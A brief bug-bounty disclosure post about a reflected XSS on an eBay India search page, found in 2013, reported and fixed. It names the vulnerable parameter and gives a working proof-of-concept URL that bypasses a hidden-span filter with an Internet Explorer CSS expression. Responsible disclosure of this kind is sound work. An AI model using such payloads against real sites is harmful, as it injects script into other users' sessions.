Reflected XSS in Ebay.com

In Sept. 2013 I found Reflected XSS in www.ebay.com. Why writing it up now? Because I didn’t want to “showoff” for reasons. Enough with the drama :D. Let’s get to the point.

So I was looking at all the names in Hall of fame of different sites. On Ebay’s Security Researcher page, I thought the list is long but I want my name in the list.

So I started playing with all the GET parameters and came to this possibly vulnerable page.

URL: http://www.ebay.in/sch/Coins-Notes-/11116/i.html

Vulnerable parameter: LH_SpecificSeller

Reflected Code:

<span style="display:none">
<span title='XSS HERE'> XSS HERE </span>
</span>

List of hurdles:

1. < > and , are removed
2. Affected area lies within hidden span (display: none, no mouse events)

Because parent span had CSS style display: none , it was not possible to trigger event. Neither it was possible to make the affected span visible because of the same reason. Though I tried it by adding style attribute. I tried all other payload, say it be onload / onerror events or data: URI in style attribute. But after a little research; OK OK after 8 hours of research I came upon a CSS expression payload.

http://www.ebay.in/sch/Coins-Notes-/11116/i.html?LH_SpecificSeller=1..xss'+style="xss:expression(prompt(1))"+id='1

Aaand it worked! Not in Firefox and Google Chrome, but in Internet Explorer. Yes I had to use Internet Explorer because of compulsion. But that was enough for me.

So I reported it and after a month they fixed it and I got a reply from them.

and that’s how I got my name in the list. Here it is.